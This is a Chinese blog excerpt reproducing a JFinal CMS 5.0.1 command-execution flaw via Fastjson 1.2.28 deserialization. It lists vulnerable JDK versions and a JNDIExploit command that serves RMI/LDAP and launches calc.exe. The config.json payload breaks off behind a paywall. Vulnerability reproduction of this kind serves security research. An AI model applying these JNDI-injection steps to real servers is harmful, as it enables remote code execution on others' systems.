漏洞环境
jfinal_cms 5.0.1 中存在命令执行漏洞
JDK 版本要求:
- 基于 RMI<=6u141、7u131、8u121 使用的 JDK 版本
- 基于 LDAP<=6u211、7u201、8u191 使用的 JDK 版本。
jfinal_cms版本:5.0.1
fastjson版本:1.2.28
漏洞复用
测试中使用的JDK版本:JDK8u101
在 kali 上运行该工具,启动 rmi 和 ldap 服务
https://github.com/feihong-cs/JNDIExploit
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "calc.exe"

替换payload中的rmi或ldap地址,然后保存到config.json
{

本文详细介绍了JFinal CMS5.0.1中存在的命令执行漏洞,该漏洞利用了Fastjson的反序列化机制。通过特定的JDK版本和配置,攻击者可以触发命令执行,如在Kali Linux上运行工具启动RMI和LDAP服务,利用payload替换config.json内容,最终在后台管理中上传payload文件,访问特定URL导致计算器弹出。漏洞涉及JFinal CMS、Fastjson和Ueditor等多个组件。
最低0.47元/天 解锁文章
606

被折叠的 条评论
为什么被折叠?



